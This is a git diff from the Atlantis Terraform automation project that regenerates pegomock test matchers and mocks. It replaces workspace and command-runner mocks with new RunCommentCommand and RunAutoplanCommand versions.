diff --git a/server/events/mocks/matchers/events_commandparseresult.go b/server/events/mocks/matchers/events_commandparseresult.go
deleted file mode 100644
index 12e5991a7e..0000000000
--- a/server/events/mocks/matchers/events_commandparseresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsCommandParseResult() events.CommentParseResult {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommentParseResult))(nil)).Elem()))
- var nullValue events.CommentParseResult
- return nullValue
-}
-
-func EqEventsCommandParseResult(value events.CommentParseResult) events.CommentParseResult {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.CommentParseResult
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_commandresponse.go b/server/events/mocks/matchers/events_commandresponse.go
deleted file mode 100644
index f596b2c4db..0000000000
--- a/server/events/mocks/matchers/events_commandresponse.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsCommandResponse() events.CommandResponse {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResponse))(nil)).Elem()))
- var nullValue events.CommandResponse
- return nullValue
-}
-
-func EqEventsCommandResponse(value events.CommandResponse) events.CommandResponse {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.CommandResponse
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_commandresult.go b/server/events/mocks/matchers/events_commandresult.go
new file mode 100644
index 0000000000..54269ef123
--- /dev/null
+++ b/server/events/mocks/matchers/events_commandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsCommandResult() events.CommandResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResult))(nil)).Elem()))
+ var nullValue events.CommandResult
+ return nullValue
+}
+
+func EqEventsCommandResult(value events.CommandResult) events.CommandResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.CommandResult
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/events_preexecuteresult.go b/server/events/mocks/matchers/events_preexecuteresult.go
deleted file mode 100644
index b8be09b1a2..0000000000
--- a/server/events/mocks/matchers/events_preexecuteresult.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyEventsPreExecuteResult() events.PreExecuteResult {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.PreExecuteResult))(nil)).Elem()))
- var nullValue events.PreExecuteResult
- return nullValue
-}
-
-func EqEventsPreExecuteResult(value events.PreExecuteResult) events.PreExecuteResult {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue events.PreExecuteResult
- return nullValue
-}
diff --git a/server/events/mocks/matchers/events_projectcommandresult.go b/server/events/mocks/matchers/events_projectcommandresult.go
new file mode 100644
index 0000000000..522a4ccf83
--- /dev/null
+++ b/server/events/mocks/matchers/events_projectcommandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsProjectCommandResult() events.ProjectCommandResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.ProjectCommandResult))(nil)).Elem()))
+ var nullValue events.ProjectCommandResult
+ return nullValue
+}
+
+func EqEventsProjectCommandResult(value events.ProjectCommandResult) events.ProjectCommandResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.ProjectCommandResult
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/models_projectcommandcontext.go b/server/events/mocks/matchers/models_projectcommandcontext.go
new file mode 100644
index 0000000000..3f76b9a225
--- /dev/null
+++ b/server/events/mocks/matchers/models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsProjectCommandContext() models.ProjectCommandContext {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.ProjectCommandContext))(nil)).Elem()))
+ var nullValue models.ProjectCommandContext
+ return nullValue
+}
+
+func EqModelsProjectCommandContext(value models.ProjectCommandContext) models.ProjectCommandContext {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.ProjectCommandContext
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_command.go
deleted file mode 100644
index 91edd3b663..0000000000
--- a/server/events/mocks/matchers/ptr_to_events_command.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
-)
-
-func AnyPtrToEventsCommand() *events.Command {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.Command))(nil)).Elem()))
- var nullValue *events.Command
- return nullValue
-}
-
-func EqPtrToEventsCommand(value *events.Command) *events.Command {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *events.Command
- return nullValue
-}
diff --git a/server/events/mocks/matchers/ptr_to_events_commentcommand.go b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
new file mode 100644
index 0000000000..fbbbfcc15c
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyPtrToEventsCommentCommand() *events.CommentCommand {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem()))
+ var nullValue *events.CommentCommand
+ return nullValue
+}
+
+func EqPtrToEventsCommentCommand(value *events.CommentCommand) *events.CommentCommand {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *events.CommentCommand
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_events_trylockresponse.go b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
new file mode 100644
index 0000000000..14d747bb4a
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyPtrToEventsTryLockResponse() *events.TryLockResponse {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.TryLockResponse))(nil)).Elem()))
+ var nullValue *events.TryLockResponse
+ return nullValue
+}
+
+func EqPtrToEventsTryLockResponse(value *events.TryLockResponse) *events.TryLockResponse {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *events.TryLockResponse
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
new file mode 100644
index 0000000000..1952cf1f74
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ github "github.com/google/go-github/github"
+ "github.com/petergtz/pegomock"
+)
+
+func AnyPtrToGithubPullRequestEvent() *github.PullRequestEvent {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*github.PullRequestEvent))(nil)).Elem()))
+ var nullValue *github.PullRequestEvent
+ return nullValue
+}
+
+func EqPtrToGithubPullRequestEvent(value *github.PullRequestEvent) *github.PullRequestEvent {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *github.PullRequestEvent
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_models_repo.go b/server/events/mocks/matchers/ptr_to_models_repo.go
new file mode 100644
index 0000000000..05ba1aef35
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyPtrToModelsRepo() *models.Repo {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*models.Repo))(nil)).Elem()))
+ var nullValue *models.Repo
+ return nullValue
+}
+
+func EqPtrToModelsRepo(value *models.Repo) *models.Repo {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue *models.Repo
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
new file mode 100644
index 0000000000..08974c59cd
--- /dev/null
+++ b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnySliceOfModelsProjectCommandContext() []models.ProjectCommandContext {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]models.ProjectCommandContext))(nil)).Elem()))
+ var nullValue []models.ProjectCommandContext
+ return nullValue
+}
+
+func EqSliceOfModelsProjectCommandContext(value []models.ProjectCommandContext) []models.ProjectCommandContext {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue []models.ProjectCommandContext
+ return nullValue
+}
diff --git a/server/events/mocks/matchers/webhooks_applyresult.go b/server/events/mocks/matchers/webhooks_applyresult.go
new file mode 100644
index 0000000000..2a643f6034
--- /dev/null
+++ b/server/events/mocks/matchers/webhooks_applyresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+)
+
+func AnyWebhooksApplyResult() webhooks.ApplyResult {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(webhooks.ApplyResult))(nil)).Elem()))
+ var nullValue webhooks.ApplyResult
+ return nullValue
+}
+
+func EqWebhooksApplyResult(value webhooks.ApplyResult) webhooks.ApplyResult {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue webhooks.ApplyResult
+ return nullValue
+}
diff --git a/server/events/mocks/mock_atlantis_workspace.go b/server/events/mocks/mock_atlantis_workspace.go
deleted file mode 100644
index 643813cede..0000000000
--- a/server/events/mocks/mock_atlantis_workspace.go
+++ /dev/null
@@ -1,191 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspace)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- models "github.com/runatlantis/atlantis/server/events/models"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-type MockAtlantisWorkspace struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockAtlantisWorkspace() *MockAtlantisWorkspace {
- return &MockAtlantisWorkspace{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
- params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Clone", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
- params := []pegomock.Param{r, p, workspace}
- result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkspace", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) error {
- params := []pegomock.Param{r, p}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Delete", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(error)
- }
- }
- return ret0
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalledOnce() *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockAtlantisWorkspace) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspace {
- return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierAtlantisWorkspace struct {
- mock *MockAtlantisWorkspace
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_Clone_OngoingVerification {
- params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Clone", params)
- return &AtlantisWorkspace_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_Clone_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
- log, baseRepo, headRepo, p, workspace := c.GetAllCapturedArguments()
- return log[len(log)-1], baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], p[len(p)-1], workspace[len(workspace)-1]
-}
-
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*logging.SimpleLogger, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*logging.SimpleLogger)
- }
- _param1 = make([]models.Repo, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.Repo)
- }
- _param2 = make([]models.Repo, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(models.Repo)
- }
- _param3 = make([]models.PullRequest, len(params[3]))
- for u, param := range params[3] {
- _param3[u] = param.(models.PullRequest)
- }
- _param4 = make([]string, len(params[4]))
- for u, param := range params[4] {
- _param4[u] = param.(string)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_GetWorkspace_OngoingVerification {
- params := []pegomock.Param{r, p, workspace}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkspace", params)
- return &AtlantisWorkspace_GetWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_GetWorkspace_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
- r, p, workspace := c.GetAllCapturedArguments()
- return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
-}
-
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]models.Repo, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(models.Repo)
- }
- _param1 = make([]models.PullRequest, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
- }
- _param2 = make([]string, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(string)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) *AtlantisWorkspace_Delete_OngoingVerification {
- params := []pegomock.Param{r, p}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Delete", params)
- return &AtlantisWorkspace_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspace_Delete_OngoingVerification struct {
- mock *MockAtlantisWorkspace
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
- r, p := c.GetAllCapturedArguments()
- return r[len(r)-1], p[len(p)-1]
-}
-
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]models.Repo, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(models.Repo)
- }
- _param1 = make([]models.PullRequest, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(models.PullRequest)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go
deleted file mode 100644
index 3f190f396e..0000000000
--- a/server/events/mocks/mock_atlantis_workspace_locker.go
+++ /dev/null
@@ -1,123 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspaceLocker)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
-)
-
-type MockAtlantisWorkspaceLocker struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockAtlantisWorkspaceLocker() *MockAtlantisWorkspaceLocker {
- return &MockAtlantisWorkspaceLocker{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem()})
- var ret0 bool
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(bool)
- }
- }
- return ret0
-}
-
-func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledOnce() *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspaceLocker {
- return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierAtlantisWorkspaceLocker struct {
- mock *MockAtlantisWorkspaceLocker
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock_OngoingVerification {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
- return &AtlantisWorkspaceLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspaceLocker_TryLock_OngoingVerification struct {
- mock *MockAtlantisWorkspaceLocker
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
- repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
- return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
-}
-
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]string, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(string)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]int, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(int)
- }
- }
- return
-}
-
-func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification {
- params := []pegomock.Param{repoFullName, workspace, pullNum}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
- return &AtlantisWorkspaceLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type AtlantisWorkspaceLocker_Unlock_OngoingVerification struct {
- mock *MockAtlantisWorkspaceLocker
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
- repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
- return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
-}
-
-func (c *AtlantisWorkspaceLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]string, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(string)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]int, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(int)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_command_runner.go b/server/events/mocks/mock_command_runner.go
index 481fcf72f5..8ef3387c0d 100644
--- a/server/events/mocks/mock_command_runner.go
+++ b/server/events/mocks/mock_command_runner.go
@@ -19,9 +19,14 @@ func NewMockCommandRunner() *MockCommandRunner {
return &MockCommandRunner{fail: pegomock.GlobalFailHandler}
}
-func (mock *MockCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) {
- params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
- pegomock.GetGenericMockFrom(mock).Invoke("ExecuteCommand", params, []reflect.Type{})
+func (mock *MockCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) {
+ params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+ pegomock.GetGenericMockFrom(mock).Invoke("RunCommentCommand", params, []reflect.Type{})
+}
+
+func (mock *MockCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+ params := []pegomock.Param{baseRepo, headRepo, pull, user}
+ pegomock.GetGenericMockFrom(mock).Invoke("RunAutoplanCommand", params, []reflect.Type{})
}
func (mock *MockCommandRunner) VerifyWasCalledOnce() *VerifierCommandRunner {
@@ -42,32 +47,32 @@ type VerifierCommandRunner struct {
inOrderContext *pegomock.InOrderContext
}
-func (verifier *VerifierCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) *CommandRunner_ExecuteCommand_OngoingVerification {
- params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ExecuteCommand", params)
- return &CommandRunner_ExecuteCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) *CommandRunner_RunCommentCommand_OngoingVerification {
+ params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunCommentCommand", params)
+ return &CommandRunner_RunCommentCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
}
-type CommandRunner_ExecuteCommand_OngoingVerification struct {
+type CommandRunner_RunCommentCommand_OngoingVerification struct {
mock *MockCommandRunner
methodInvocations []pegomock.MethodInvocation
}
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.User, int, *events.Command) {
- baseRepo, headRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
- return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetCapturedArguments() (models.Repo, *models.Repo, models.User, int, *events.CommentCommand) {
+ baseRepo, maybeHeadRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], maybeHeadRepo[len(maybeHeadRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
}
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.Command) {
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []*models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.CommentCommand) {
params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
if len(params) > 0 {
_param0 = make([]models.Repo, len(params[0]))
for u, param := range params[0] {
_param0[u] = param.(models.Repo)
}
- _param1 = make([]models.Repo, len(params[1]))
+ _param1 = make([]*models.Repo, len(params[1]))
for u, param := range params[1] {
- _param1[u] = param.(models.Repo)
+ _param1[u] = param.(*models.Repo)
}
_param2 = make([]models.User, len(params[2]))
for u, param := range params[2] {
@@ -77,9 +82,48 @@ func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArgumen
for u, param := range params[3] {
_param3[u] = param.(int)
}
- _param4 = make([]*events.Command, len(params[4]))
+ _param4 = make([]*events.CommentCommand, len(params[4]))
for u, param := range params[4] {
- _param4[u] = param.(*events.Command)
+ _param4[u] = param.(*events.CommentCommand)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) *CommandRunner_RunAutoplanCommand_OngoingVerification {
+ params := []pegomock.Param{baseRepo, headRepo, pull, user}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunAutoplanCommand", params)
+ return &CommandRunner_RunAutoplanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type CommandRunner_RunAutoplanCommand_OngoingVerification struct {
+ mock *MockCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.PullRequest, models.User) {
+ baseRepo, headRepo, pull, user := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], pull[len(pull)-1], user[len(user)-1]
+}
+
